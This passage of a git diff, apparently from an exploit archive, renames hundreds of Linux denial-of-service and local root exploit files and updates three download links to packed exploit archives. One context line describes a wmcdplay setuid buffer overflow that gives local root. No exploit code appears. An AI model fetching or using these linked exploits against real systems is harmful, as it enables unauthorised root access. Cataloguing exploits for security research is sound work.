exploits/linux/dos/9264.py diff --git a/platforms/linux/dos/9265.c b/exploits/linux/dos/9265.c similarity index 100% rename from platforms/linux/dos/9265.c rename to exploits/linux/dos/9265.c diff --git a/platforms/linux/dos/9442.c b/exploits/linux/dos/9442.c similarity index 100% rename from platforms/linux/dos/9442.c rename to exploits/linux/dos/9442.c diff --git a/platforms/linux/dos/957.c b/exploits/linux/dos/957.c similarity index 100% rename from platforms/linux/dos/957.c rename to exploits/linux/dos/957.c diff --git a/platforms/linux/dos/958.c b/exploits/linux/dos/958.c similarity index 100% rename from platforms/linux/dos/958.c rename to exploits/linux/dos/958.c diff --git a/platforms/linux/dos/959.c b/exploits/linux/dos/959.c similarity index 100% rename from platforms/linux/dos/959.c rename to exploits/linux/dos/959.c diff --git a/platforms/linux/dos/9901.txt b/exploits/linux/dos/9901.txt similarity index 100% rename from platforms/linux/dos/9901.txt rename to exploits/linux/dos/9901.txt diff --git a/platforms/linux/dos/998.c b/exploits/linux/dos/998.c similarity index 100% rename from platforms/linux/dos/998.c rename to exploits/linux/dos/998.c diff --git a/platforms/linux/dos/999.c b/exploits/linux/dos/999.c similarity index 100% rename from platforms/linux/dos/999.c rename to exploits/linux/dos/999.c diff --git a/platforms/linux/local/10018.sh b/exploits/linux/local/10018.sh similarity index 100% rename from platforms/linux/local/10018.sh rename to exploits/linux/local/10018.sh diff --git a/platforms/linux/local/10038.txt b/exploits/linux/local/10038.txt similarity index 100% rename from platforms/linux/local/10038.txt rename to exploits/linux/local/10038.txt diff --git a/platforms/linux/local/10060.sh b/exploits/linux/local/10060.sh similarity index 100% rename from platforms/linux/local/10060.sh rename to exploits/linux/local/10060.sh diff --git a/platforms/linux/local/1009.c b/exploits/linux/local/1009.c similarity index 100% rename from platforms/linux/local/1009.c rename to exploits/linux/local/1009.c diff --git a/platforms/linux/local/1029.c b/exploits/linux/local/1029.c similarity index 100% rename from platforms/linux/local/1029.c rename to exploits/linux/local/1029.c diff --git a/platforms/linux/local/10313.c b/exploits/linux/local/10313.c similarity index 100% rename from platforms/linux/local/10313.c rename to exploits/linux/local/10313.c diff --git a/platforms/linux/local/10396.pl b/exploits/linux/local/10396.pl similarity index 100% rename from platforms/linux/local/10396.pl rename to exploits/linux/local/10396.pl diff --git a/platforms/linux/local/104.c b/exploits/linux/local/104.c similarity index 100% rename from platforms/linux/local/104.c rename to exploits/linux/local/104.c diff --git a/platforms/linux/local/10487.txt b/exploits/linux/local/10487.txt similarity index 100% rename from platforms/linux/local/10487.txt rename to exploits/linux/local/10487.txt diff --git a/platforms/linux/local/106.c b/exploits/linux/local/106.c similarity index 100% rename from platforms/linux/local/106.c rename to exploits/linux/local/106.c diff --git a/platforms/linux/local/10613.c b/exploits/linux/local/10613.c similarity index 100% rename from platforms/linux/local/10613.c rename to exploits/linux/local/10613.c diff --git a/platforms/linux/local/1154.pl b/exploits/linux/local/1154.pl similarity index 100% rename from platforms/linux/local/1154.pl rename to exploits/linux/local/1154.pl diff --git a/platforms/linux/local/1170.c b/exploits/linux/local/1170.c similarity index 100% rename from platforms/linux/local/1170.c rename to exploits/linux/local/1170.c diff --git a/platforms/linux/local/1181.c b/exploits/linux/local/1181.c similarity index 100% rename from platforms/linux/local/1181.c rename to exploits/linux/local/1181.c diff --git a/platforms/linux/local/1187.c b/exploits/linux/local/1187.c similarity index 100% rename from platforms/linux/local/1187.c rename to exploits/linux/local/1187.c diff --git a/platforms/linux/local/12.c b/exploits/linux/local/12.c similarity index 100% rename from platforms/linux/local/12.c rename to exploits/linux/local/12.c diff --git a/platforms/linux/local/120.c b/exploits/linux/local/120.c similarity index 100% rename from platforms/linux/local/120.c rename to exploits/linux/local/120.c diff --git a/platforms/linux/local/12130.py b/exploits/linux/local/12130.py similarity index 100% rename from platforms/linux/local/12130.py rename to exploits/linux/local/12130.py diff --git a/platforms/linux/local/1215.c b/exploits/linux/local/1215.c similarity index 100% rename from platforms/linux/local/1215.c rename to exploits/linux/local/1215.c diff --git a/platforms/linux/local/1229.sh b/exploits/linux/local/1229.sh similarity index 100% rename from platforms/linux/local/1229.sh rename to exploits/linux/local/1229.sh diff --git a/platforms/linux/local/1267.c b/exploits/linux/local/1267.c similarity index 100% rename from platforms/linux/local/1267.c rename to exploits/linux/local/1267.c diff --git a/platforms/linux/local/129.asm b/exploits/linux/local/129.asm similarity index 100% rename from platforms/linux/local/129.asm rename to exploits/linux/local/129.asm diff --git a/platforms/linux/local/1297.py b/exploits/linux/local/1297.py similarity index 100% rename from platforms/linux/local/1297.py rename to exploits/linux/local/1297.py diff --git a/platforms/linux/local/1299.sh b/exploits/linux/local/1299.sh similarity index 100% rename from platforms/linux/local/1299.sh rename to exploits/linux/local/1299.sh diff --git a/platforms/linux/local/1300.sh b/exploits/linux/local/1300.sh similarity index 100% rename from platforms/linux/local/1300.sh rename to exploits/linux/local/1300.sh diff --git a/platforms/linux/local/131.c b/exploits/linux/local/131.c similarity index 100% rename from platforms/linux/local/131.c rename to exploits/linux/local/131.c diff --git a/platforms/linux/local/1310.txt b/exploits/linux/local/1310.txt similarity index 100% rename from platforms/linux/local/1310.txt rename to exploits/linux/local/1310.txt diff --git a/platforms/linux/local/1316.pl b/exploits/linux/local/1316.pl similarity index 100% rename from platforms/linux/local/1316.pl rename to exploits/linux/local/1316.pl diff --git a/platforms/linux/local/1397.c b/exploits/linux/local/1397.c similarity index 100% rename from platforms/linux/local/1397.c rename to exploits/linux/local/1397.c diff --git a/platforms/linux/local/140.c b/exploits/linux/local/140.c similarity index 100% rename from platforms/linux/local/140.c rename to exploits/linux/local/140.c diff --git a/platforms/linux/local/141.c b/exploits/linux/local/141.c similarity index 100% rename from platforms/linux/local/141.c rename to exploits/linux/local/141.c diff --git a/platforms/linux/local/1412.rb b/exploits/linux/local/1412.rb similarity index 100% rename from platforms/linux/local/1412.rb rename to exploits/linux/local/1412.rb diff --git a/platforms/linux/local/1415.c b/exploits/linux/local/1415.c similarity index 100% rename from platforms/linux/local/1415.c rename to exploits/linux/local/1415.c diff --git a/platforms/linux/local/142.c b/exploits/linux/local/142.c similarity index 100% rename from platforms/linux/local/142.c rename to exploits/linux/local/142.c diff --git a/platforms/linux/local/1425.c b/exploits/linux/local/1425.c similarity index 100% rename from platforms/linux/local/1425.c rename to exploits/linux/local/1425.c diff --git a/platforms/linux/local/14273.sh b/exploits/linux/local/14273.sh similarity index 100% rename from platforms/linux/local/14273.sh rename to exploits/linux/local/14273.sh diff --git a/platforms/linux/local/14339.sh b/exploits/linux/local/14339.sh similarity index 100% rename from platforms/linux/local/14339.sh rename to exploits/linux/local/14339.sh diff --git a/platforms/linux/local/144.c b/exploits/linux/local/144.c similarity index 100% rename from platforms/linux/local/144.c rename to exploits/linux/local/144.c diff --git a/platforms/linux/local/1445.c b/exploits/linux/local/1445.c similarity index 100% rename from platforms/linux/local/1445.c rename to exploits/linux/local/1445.c diff --git a/platforms/linux/local/1449.c b/exploits/linux/local/1449.c similarity index 100% rename from platforms/linux/local/1449.c rename to exploits/linux/local/1449.c diff --git a/platforms/linux/local/145.c b/exploits/linux/local/145.c similarity index 100% rename from platforms/linux/local/145.c rename to exploits/linux/local/145.c diff --git a/platforms/linux/local/14814.c b/exploits/linux/local/14814.c similarity index 100% rename from platforms/linux/local/14814.c rename to exploits/linux/local/14814.c diff --git a/platforms/linux/local/14830.py b/exploits/linux/local/14830.py similarity index 100% rename from platforms/linux/local/14830.py rename to exploits/linux/local/14830.py diff --git a/platforms/linux/local/15074.sh b/exploits/linux/local/15074.sh similarity index 100% rename from platforms/linux/local/15074.sh rename to exploits/linux/local/15074.sh diff --git a/platforms/linux/local/15150.c b/exploits/linux/local/15150.c similarity index 100% rename from platforms/linux/local/15150.c rename to exploits/linux/local/15150.c diff --git a/platforms/linux/local/15155.c b/exploits/linux/local/15155.c similarity index 100% rename from platforms/linux/local/15155.c rename to exploits/linux/local/15155.c diff --git a/platforms/linux/local/1518.c b/exploits/linux/local/1518.c similarity index 100% rename from platforms/linux/local/1518.c rename to exploits/linux/local/1518.c diff --git a/platforms/linux/local/152.c b/exploits/linux/local/152.c similarity index 100% rename from platforms/linux/local/152.c rename to exploits/linux/local/152.c diff --git a/platforms/linux/local/15274.txt b/exploits/linux/local/15274.txt similarity index 100% rename from platforms/linux/local/15274.txt rename to exploits/linux/local/15274.txt diff --git a/platforms/linux/local/15285.c b/exploits/linux/local/15285.c similarity index 100% rename from platforms/linux/local/15285.c rename to exploits/linux/local/15285.c diff --git a/platforms/linux/local/15304.txt b/exploits/linux/local/15304.txt similarity index 100% rename from platforms/linux/local/15304.txt rename to exploits/linux/local/15304.txt diff --git a/platforms/linux/local/15344.c b/exploits/linux/local/15344.c similarity index 100% rename from platforms/linux/local/15344.c rename to exploits/linux/local/15344.c diff --git a/platforms/linux/local/154.c b/exploits/linux/local/154.c similarity index 100% rename from platforms/linux/local/154.c rename to exploits/linux/local/154.c diff --git a/platforms/linux/local/15481.c b/exploits/linux/local/15481.c similarity index 100% rename from platforms/linux/local/15481.c rename to exploits/linux/local/15481.c diff --git a/platforms/linux/local/15620.sh b/exploits/linux/local/15620.sh similarity index 100% rename from platforms/linux/local/15620.sh rename to exploits/linux/local/15620.sh diff --git a/platforms/linux/local/15704.c b/exploits/linux/local/15704.c similarity index 100% rename from platforms/linux/local/15704.c rename to exploits/linux/local/15704.c diff --git a/platforms/linux/local/15745.txt b/exploits/linux/local/15745.txt similarity index 100% rename from platforms/linux/local/15745.txt rename to exploits/linux/local/15745.txt diff --git a/platforms/linux/local/15774.c b/exploits/linux/local/15774.c similarity index 100% rename from platforms/linux/local/15774.c rename to exploits/linux/local/15774.c diff --git a/platforms/linux/local/1579.pl b/exploits/linux/local/1579.pl similarity index 100% rename from platforms/linux/local/1579.pl rename to exploits/linux/local/1579.pl diff --git a/platforms/linux/local/1591.py b/exploits/linux/local/1591.py similarity index 100% rename from platforms/linux/local/1591.py rename to exploits/linux/local/1591.py diff --git a/platforms/linux/local/15944.c b/exploits/linux/local/15944.c similarity index 100% rename from platforms/linux/local/15944.c rename to exploits/linux/local/15944.c diff --git a/platforms/linux/local/1596.txt b/exploits/linux/local/1596.txt similarity index 90% rename from platforms/linux/local/1596.txt rename to exploits/linux/local/1596.txt index 89a3c6ab7..3bb00a2c9 100644 --- a/platforms/linux/local/1596.txt +++ b/exploits/linux/local/1596.txt @@ -24,6 +24,6 @@ X Protocol Version 11, Revision 0, Release 7.0 r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)... -# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1596.tgz (xmodulepath.tgz) +# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1596.tgz (xmodulepath.tgz) # milw0rm.com [2006-03-20] \ No newline at end of file diff --git a/platforms/linux/local/160.c b/exploits/linux/local/160.c similarity index 100% rename from platforms/linux/local/160.c rename to exploits/linux/local/160.c diff --git a/platforms/linux/local/16086.txt b/exploits/linux/local/16086.txt similarity index 100% rename from platforms/linux/local/16086.txt rename to exploits/linux/local/16086.txt diff --git a/platforms/linux/local/17083.pl b/exploits/linux/local/17083.pl similarity index 100% rename from platforms/linux/local/17083.pl rename to exploits/linux/local/17083.pl diff --git a/platforms/linux/local/17147.txt b/exploits/linux/local/17147.txt similarity index 100% rename from platforms/linux/local/17147.txt rename to exploits/linux/local/17147.txt diff --git a/platforms/linux/local/17391.c b/exploits/linux/local/17391.c similarity index 100% rename from platforms/linux/local/17391.c rename to exploits/linux/local/17391.c diff --git a/platforms/linux/local/17611.pl b/exploits/linux/local/17611.pl similarity index 100% rename from platforms/linux/local/17611.pl rename to exploits/linux/local/17611.pl diff --git a/platforms/linux/local/17787.c b/exploits/linux/local/17787.c similarity index 100% rename from platforms/linux/local/17787.c rename to exploits/linux/local/17787.c diff --git a/platforms/linux/local/178.c b/exploits/linux/local/178.c similarity index 100% rename from platforms/linux/local/178.c rename to exploits/linux/local/178.c diff --git a/platforms/linux/local/17932.c b/exploits/linux/local/17932.c similarity index 100% rename from platforms/linux/local/17932.c rename to exploits/linux/local/17932.c diff --git a/platforms/linux/local/17942.c b/exploits/linux/local/17942.c similarity index 100% rename from platforms/linux/local/17942.c rename to exploits/linux/local/17942.c diff --git a/platforms/linux/local/180.c b/exploits/linux/local/180.c similarity index 100% rename from platforms/linux/local/180.c rename to exploits/linux/local/180.c diff --git a/platforms/linux/local/18040.c b/exploits/linux/local/18040.c similarity index 100% rename from platforms/linux/local/18040.c rename to exploits/linux/local/18040.c diff --git a/platforms/linux/local/18064.sh b/exploits/linux/local/18064.sh similarity index 100% rename from platforms/linux/local/18064.sh rename to exploits/linux/local/18064.sh diff --git a/platforms/linux/local/18071.sh b/exploits/linux/local/18071.sh similarity index 100% rename from platforms/linux/local/18071.sh rename to exploits/linux/local/18071.sh diff --git a/platforms/linux/local/18072.sh b/exploits/linux/local/18072.sh similarity index 100% rename from platforms/linux/local/18072.sh rename to exploits/linux/local/18072.sh diff --git a/platforms/linux/local/18080.c b/exploits/linux/local/18080.c similarity index 100% rename from platforms/linux/local/18080.c rename to exploits/linux/local/18080.c diff --git a/platforms/linux/local/18086.c b/exploits/linux/local/18086.c similarity index 100% rename from platforms/linux/local/18086.c rename to exploits/linux/local/18086.c diff --git a/platforms/linux/local/18105.sh b/exploits/linux/local/18105.sh similarity index 100% rename from platforms/linux/local/18105.sh rename to exploits/linux/local/18105.sh diff --git a/platforms/linux/local/18147.c b/exploits/linux/local/18147.c similarity index 100% rename from platforms/linux/local/18147.c rename to exploits/linux/local/18147.c diff --git a/platforms/linux/local/182.sh b/exploits/linux/local/182.sh similarity index 100% rename from platforms/linux/local/182.sh rename to exploits/linux/local/182.sh diff --git a/platforms/linux/local/18228.sh b/exploits/linux/local/18228.sh similarity index 100% rename from platforms/linux/local/18228.sh rename to exploits/linux/local/18228.sh diff --git a/platforms/linux/local/183.c b/exploits/linux/local/183.c similarity index 100% rename from platforms/linux/local/183.c rename to exploits/linux/local/183.c diff --git a/platforms/linux/local/1831.txt b/exploits/linux/local/1831.txt similarity index 87% rename from platforms/linux/local/1831.txt rename to exploits/linux/local/1831.txt index 04fd27e19..6ad8af54f 100644 --- a/platforms/linux/local/1831.txt +++ b/exploits/linux/local/1831.txt @@ -9,7 +9,7 @@ that data is overwritten again correctly by a program' function). .bss section is in higher addresses than .dtors section, so, we can't hijack .dtors to.... -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz) +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz) nitr0us diff --git a/platforms/linux/local/184.pl b/exploits/linux/local/184.pl similarity index 100% rename from platforms/linux/local/184.pl rename to exploits/linux/local/184.pl diff --git a/platforms/linux/local/18411.c b/exploits/linux/local/18411.c similarity index 100% rename from platforms/linux/local/18411.c rename to exploits/linux/local/18411.c diff --git a/platforms/linux/local/186.pl b/exploits/linux/local/186.pl similarity index 100% rename from platforms/linux/local/186.pl rename to exploits/linux/local/186.pl diff --git a/platforms/linux/local/18733.py b/exploits/linux/local/18733.py similarity index 100% rename from platforms/linux/local/18733.py rename to exploits/linux/local/18733.py diff --git a/platforms/linux/local/18783.txt b/exploits/linux/local/18783.txt similarity index 100% rename from platforms/linux/local/18783.txt rename to exploits/linux/local/18783.txt diff --git a/platforms/linux/local/18785.txt b/exploits/linux/local/18785.txt similarity index 100% rename from platforms/linux/local/18785.txt rename to exploits/linux/local/18785.txt diff --git a/platforms/linux/local/18917.txt b/exploits/linux/local/18917.txt similarity index 100% rename from platforms/linux/local/18917.txt rename to exploits/linux/local/18917.txt diff --git a/platforms/linux/local/19070.txt b/exploits/linux/local/19070.txt similarity index 100% rename from platforms/linux/local/19070.txt rename to exploits/linux/local/19070.txt diff --git a/platforms/linux/local/19071.txt b/exploits/linux/local/19071.txt similarity index 100% rename from platforms/linux/local/19071.txt rename to exploits/linux/local/19071.txt diff --git a/platforms/linux/local/19072.txt b/exploits/linux/local/19072.txt similarity index 100% rename from platforms/linux/local/19072.txt rename to exploits/linux/local/19072.txt diff --git a/platforms/linux/local/19073.txt b/exploits/linux/local/19073.txt similarity index 100% rename from platforms/linux/local/19073.txt rename to exploits/linux/local/19073.txt diff --git a/platforms/linux/local/19074.txt b/exploits/linux/local/19074.txt similarity index 100% rename from platforms/linux/local/19074.txt rename to exploits/linux/local/19074.txt diff --git a/platforms/linux/local/19077.c b/exploits/linux/local/19077.c similarity index 100% rename from platforms/linux/local/19077.c rename to exploits/linux/local/19077.c diff --git a/platforms/linux/local/19078.c b/exploits/linux/local/19078.c similarity index 100% rename from platforms/linux/local/19078.c rename to exploits/linux/local/19078.c diff --git a/platforms/linux/local/19080.txt b/exploits/linux/local/19080.txt similarity index 100% rename from platforms/linux/local/19080.txt rename to exploits/linux/local/19080.txt diff --git a/platforms/linux/local/19095.txt b/exploits/linux/local/19095.txt similarity index 100% rename from platforms/linux/local/19095.txt rename to exploits/linux/local/19095.txt diff --git a/platforms/linux/local/19106.c b/exploits/linux/local/19106.c similarity index 100% rename from platforms/linux/local/19106.c rename to exploits/linux/local/19106.c diff --git a/platforms/linux/local/19122.txt b/exploits/linux/local/19122.txt similarity index 100% rename from platforms/linux/local/19122.txt rename to exploits/linux/local/19122.txt diff --git a/platforms/linux/local/19125.txt b/exploits/linux/local/19125.txt similarity index 100% rename from platforms/linux/local/19125.txt rename to exploits/linux/local/19125.txt diff --git a/platforms/linux/local/19142.sh b/exploits/linux/local/19142.sh similarity index 100% rename from platforms/linux/local/19142.sh rename to exploits/linux/local/19142.sh diff --git a/platforms/linux/local/19146.sh b/exploits/linux/local/19146.sh similarity index 100% rename from platforms/linux/local/19146.sh rename to exploits/linux/local/19146.sh diff --git a/platforms/linux/local/19240.c b/exploits/linux/local/19240.c similarity index 100% rename from platforms/linux/local/19240.c rename to exploits/linux/local/19240.c diff --git a/platforms/linux/local/19243.txt b/exploits/linux/local/19243.txt similarity index 100% rename from platforms/linux/local/19243.txt rename to exploits/linux/local/19243.txt diff --git a/platforms/linux/local/19249.c b/exploits/linux/local/19249.c similarity index 100% rename from platforms/linux/local/19249.c rename to exploits/linux/local/19249.c diff --git a/platforms/linux/local/19254.c b/exploits/linux/local/19254.c similarity index 100% rename from platforms/linux/local/19254.c rename to exploits/linux/local/19254.c diff --git a/platforms/linux/local/19255.txt b/exploits/linux/local/19255.txt similarity index 100% rename from platforms/linux/local/19255.txt rename to exploits/linux/local/19255.txt diff --git a/platforms/linux/local/19256.c b/exploits/linux/local/19256.c similarity index 100% rename from platforms/linux/local/19256.c rename to exploits/linux/local/19256.c diff --git a/platforms/linux/local/19257.c b/exploits/linux/local/19257.c similarity index 100% rename from platforms/linux/local/19257.c rename to exploits/linux/local/19257.c diff --git a/platforms/linux/local/19259.c b/exploits/linux/local/19259.c similarity index 100% rename from platforms/linux/local/19259.c rename to exploits/linux/local/19259.c diff --git a/platforms/linux/local/19270.c b/exploits/linux/local/19270.c similarity index 100% rename from platforms/linux/local/19270.c rename to exploits/linux/local/19270.c diff --git a/platforms/linux/local/19279.sh b/exploits/linux/local/19279.sh similarity index 100% rename from platforms/linux/local/19279.sh rename to exploits/linux/local/19279.sh diff --git a/platforms/linux/local/19281.c b/exploits/linux/local/19281.c similarity index 100% rename from platforms/linux/local/19281.c rename to exploits/linux/local/19281.c diff --git a/platforms/linux/local/19283.c b/exploits/linux/local/19283.c similarity index 100% rename from platforms/linux/local/19283.c rename to exploits/linux/local/19283.c diff --git a/platforms/linux/local/19284.c b/exploits/linux/local/19284.c similarity index 100% rename from platforms/linux/local/19284.c rename to exploits/linux/local/19284.c diff --git a/platforms/linux/local/19285.txt b/exploits/linux/local/19285.txt similarity index 100% rename from platforms/linux/local/19285.txt rename to exploits/linux/local/19285.txt diff --git a/platforms/linux/local/19286.c b/exploits/linux/local/19286.c similarity index 100% rename from platforms/linux/local/19286.c rename to exploits/linux/local/19286.c diff --git a/platforms/linux/local/193.sh b/exploits/linux/local/193.sh similarity index 100% rename from platforms/linux/local/193.sh rename to exploits/linux/local/193.sh diff --git a/platforms/linux/local/19302.c b/exploits/linux/local/19302.c similarity index 100% rename from platforms/linux/local/19302.c rename to exploits/linux/local/19302.c diff --git a/platforms/linux/local/19305.c b/exploits/linux/local/19305.c similarity index 100% rename from platforms/linux/local/19305.c rename to exploits/linux/local/19305.c diff --git a/platforms/linux/local/19311.c b/exploits/linux/local/19311.c similarity index 100% rename from platforms/linux/local/19311.c rename to exploits/linux/local/19311.c diff --git a/platforms/linux/local/19312.c b/exploits/linux/local/19312.c similarity index 100% rename from platforms/linux/local/19312.c rename to exploits/linux/local/19312.c diff --git a/platforms/linux/local/19314.c b/exploits/linux/local/19314.c similarity index 100% rename from platforms/linux/local/19314.c rename to exploits/linux/local/19314.c diff --git a/platforms/linux/local/19315.c b/exploits/linux/local/19315.c similarity index 100% rename from platforms/linux/local/19315.c rename to exploits/linux/local/19315.c diff --git a/platforms/linux/local/19360.c b/exploits/linux/local/19360.c similarity index 100% rename from platforms/linux/local/19360.c rename to exploits/linux/local/19360.c diff --git a/platforms/linux/local/19370.c b/exploits/linux/local/19370.c similarity index 100% rename from platforms/linux/local/19370.c rename to exploits/linux/local/19370.c diff --git a/platforms/linux/local/19371.c b/exploits/linux/local/19371.c similarity index 100% rename from platforms/linux/local/19371.c rename to exploits/linux/local/19371.c diff --git a/platforms/linux/local/19373.c b/exploits/linux/local/19373.c similarity index 100% rename from platforms/linux/local/19373.c rename to exploits/linux/local/19373.c diff --git a/platforms/linux/local/19374.c b/exploits/linux/local/19374.c similarity index 100% rename from platforms/linux/local/19374.c rename to exploits/linux/local/19374.c diff --git a/platforms/linux/local/19384.c b/exploits/linux/local/19384.c similarity index 100% rename from platforms/linux/local/19384.c rename to exploits/linux/local/19384.c diff --git a/platforms/linux/local/19419.c b/exploits/linux/local/19419.c similarity index 100% rename from platforms/linux/local/19419.c rename to exploits/linux/local/19419.c diff --git a/platforms/linux/local/19422.txt b/exploits/linux/local/19422.txt similarity index 100% rename from platforms/linux/local/19422.txt rename to exploits/linux/local/19422.txt diff --git a/platforms/linux/local/19428.c b/exploits/linux/local/19428.c similarity index 100% rename from platforms/linux/local/19428.c rename to exploits/linux/local/19428.c diff --git a/platforms/linux/local/19429.sh b/exploits/linux/local/19429.sh similarity index 100% rename from platforms/linux/local/19429.sh rename to exploits/linux/local/19429.sh diff --git a/platforms/linux/local/19464.c b/exploits/linux/local/19464.c similarity index 100% rename from platforms/linux/local/19464.c rename to exploits/linux/local/19464.c diff --git a/platforms/linux/local/19465.c b/exploits/linux/local/19465.c similarity index 100% rename from platforms/linux/local/19465.c rename to exploits/linux/local/19465.c diff --git a/platforms/linux/local/19467.c b/exploits/linux/local/19467.c similarity index 100% rename from platforms/linux/local/19467.c rename to exploits/linux/local/19467.c diff --git a/platforms/linux/local/19469.c b/exploits/linux/local/19469.c similarity index 100% rename from platforms/linux/local/19469.c rename to exploits/linux/local/19469.c diff --git a/platforms/linux/local/19470.c b/exploits/linux/local/19470.c similarity index 100% rename from platforms/linux/local/19470.c rename to exploits/linux/local/19470.c diff --git a/platforms/linux/local/19474.txt b/exploits/linux/local/19474.txt similarity index 100% rename from platforms/linux/local/19474.txt rename to exploits/linux/local/19474.txt diff --git a/platforms/linux/local/19485.c b/exploits/linux/local/19485.c similarity index 100% rename from platforms/linux/local/19485.c rename to exploits/linux/local/19485.c diff --git a/platforms/linux/local/19499.c b/exploits/linux/local/19499.c similarity index 100% rename from platforms/linux/local/19499.c rename to exploits/linux/local/19499.c diff --git a/platforms/linux/local/19500.c b/exploits/linux/local/19500.c similarity index 100% rename from platforms/linux/local/19500.c rename to exploits/linux/local/19500.c diff --git a/platforms/linux/local/19501.c b/exploits/linux/local/19501.c similarity index 100% rename from platforms/linux/local/19501.c rename to exploits/linux/local/19501.c diff --git a/platforms/linux/local/19508.sh b/exploits/linux/local/19508.sh similarity index 100% rename from platforms/linux/local/19508.sh rename to exploits/linux/local/19508.sh diff --git a/platforms/linux/local/19510.pl b/exploits/linux/local/19510.pl similarity index 100% rename from platforms/linux/local/19510.pl rename to exploits/linux/local/19510.pl diff --git a/platforms/linux/local/19511.c b/exploits/linux/local/19511.c similarity index 100% rename from platforms/linux/local/19511.c rename to exploits/linux/local/19511.c diff --git a/platforms/linux/local/19512.sh b/exploits/linux/local/19512.sh similarity index 100% rename from platforms/linux/local/19512.sh rename to exploits/linux/local/19512.sh diff --git a/platforms/linux/local/19517.pl b/exploits/linux/local/19517.pl similarity index 100% rename from platforms/linux/local/19517.pl rename to exploits/linux/local/19517.pl diff --git a/platforms/linux/local/19523.txt b/exploits/linux/local/19523.txt similarity index 100% rename from platforms/linux/local/19523.txt rename to exploits/linux/local/19523.txt diff --git a/platforms/linux/local/19544.c b/exploits/linux/local/19544.c similarity index 100% rename from platforms/linux/local/19544.c rename to exploits/linux/local/19544.c diff --git a/platforms/linux/local/19565.sh b/exploits/linux/local/19565.sh similarity index 100% rename from platforms/linux/local/19565.sh rename to exploits/linux/local/19565.sh diff --git a/platforms/linux/local/19602.c b/exploits/linux/local/19602.c similarity index 100% rename from platforms/linux/local/19602.c rename to exploits/linux/local/19602.c diff --git a/platforms/linux/local/19655.txt b/exploits/linux/local/19655.txt similarity index 100% rename from platforms/linux/local/19655.txt rename to exploits/linux/local/19655.txt diff --git a/platforms/linux/local/19676.c b/exploits/linux/local/19676.c similarity index 100% rename from platforms/linux/local/19676.c rename to exploits/linux/local/19676.c diff --git a/platforms/linux/local/19677.c b/exploits/linux/local/19677.c similarity index 100% rename from platforms/linux/local/19677.c rename to exploits/linux/local/19677.c diff --git a/platforms/linux/local/19693.txt b/exploits/linux/local/19693.txt similarity index 100% rename from platforms/linux/local/19693.txt rename to exploits/linux/local/19693.txt diff --git a/platforms/linux/local/19698.txt b/exploits/linux/local/19698.txt similarity index 100% rename from platforms/linux/local/19698.txt rename to exploits/linux/local/19698.txt diff --git a/platforms/linux/local/19699.txt b/exploits/linux/local/19699.txt similarity index 100% rename from platforms/linux/local/19699.txt rename to exploits/linux/local/19699.txt diff --git a/platforms/linux/local/19700.c b/exploits/linux/local/19700.c similarity index 100% rename from platforms/linux/local/19700.c rename to exploits/linux/local/19700.c diff --git a/platforms/linux/local/19709.sh b/exploits/linux/local/19709.sh similarity index 100% rename from platforms/linux/local/19709.sh rename to exploits/linux/local/19709.sh diff --git a/platforms/linux/local/19710.c b/exploits/linux/local/19710.c similarity index 100% rename from platforms/linux/local/19710.c rename to exploits/linux/local/19710.c diff --git a/platforms/linux/local/19723.txt b/exploits/linux/local/19723.txt similarity index 100% rename from platforms/linux/local/19723.txt rename to exploits/linux/local/19723.txt diff --git a/platforms/linux/local/19727.c b/exploits/linux/local/19727.c similarity index 100% rename from platforms/linux/local/19727.c rename to exploits/linux/local/19727.c diff --git a/platforms/linux/local/19735.txt b/exploits/linux/local/19735.txt similarity index 100% rename from platforms/linux/local/19735.txt rename to exploits/linux/local/19735.txt diff --git a/platforms/linux/local/19762.c b/exploits/linux/local/19762.c similarity index 100% rename from platforms/linux/local/19762.c rename to exploits/linux/local/19762.c diff --git a/platforms/linux/local/19763.txt b/exploits/linux/local/19763.txt similarity index 100% rename from platforms/linux/local/19763.txt rename to exploits/linux/local/19763.txt diff --git a/platforms/linux/local/19764.txt b/exploits/linux/local/19764.txt similarity index 100% rename from platforms/linux/local/19764.txt rename to exploits/linux/local/19764.txt diff --git a/platforms/linux/local/19765.txt b/exploits/linux/local/19765.txt similarity index 100% rename from platforms/linux/local/19765.txt rename to exploits/linux/local/19765.txt diff --git a/platforms/linux/local/19778.c b/exploits/linux/local/19778.c similarity index 100% rename from platforms/linux/local/19778.c rename to exploits/linux/local/19778.c diff --git a/platforms/linux/local/19779.c b/exploits/linux/local/19779.c similarity index 100% rename from platforms/linux/local/19779.c rename to exploits/linux/local/19779.c diff --git a/platforms/linux/local/19787.txt b/exploits/linux/local/19787.txt similarity index 100% rename from platforms/linux/local/19787.txt rename to exploits/linux/local/19787.txt diff --git a/platforms/linux/local/19794.txt b/exploits/linux/local/19794.txt similarity index 100% rename from platforms/linux/local/19794.txt rename to exploits/linux/local/19794.txt diff --git a/platforms/linux/local/19802.c b/exploits/linux/local/19802.c similarity index 100% rename from platforms/linux/local/19802.c rename to exploits/linux/local/19802.c diff --git a/platforms/linux/local/19803.txt b/exploits/linux/local/19803.txt similarity index 93% rename from platforms/linux/local/19803.txt rename to exploits/linux/local/19803.txt index 3da8a1456..4bd3063b4 100644 --- a/platforms/linux/local/19803.txt +++ b/exploits/linux/local/19803.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1047/info wmcdplay is cdplayer generally used with the WindowMaker X11 window-manager on unix systems. While wmcdplay is rarely installed at all by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to a buffer overflow attack due to lack of bounds checking on an argument it is passed. As a result, a local user can elevate their priviliges to root through overruning the stack and executing arbitrary code with the effective user-id of the process (root). -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19803.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19803.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/19804.pl b/exploits/linux/local/19804.pl similarity index 100% rename from platforms/linux/local/19804.pl rename to exploits/linux/local/19804.pl diff --git a/platforms/linux/local/19811.c b/exploits/linux/local/19811.c similarity index 100% rename from platforms/linux/local/19811.c rename to exploits/linux/local/19811.c diff --git a/platforms/linux/local/19812.c b/exploits/linux/local/19812.c similarity index 100% rename from 